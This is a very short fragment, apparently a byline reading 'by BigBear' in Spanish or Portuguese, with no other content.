por BigBear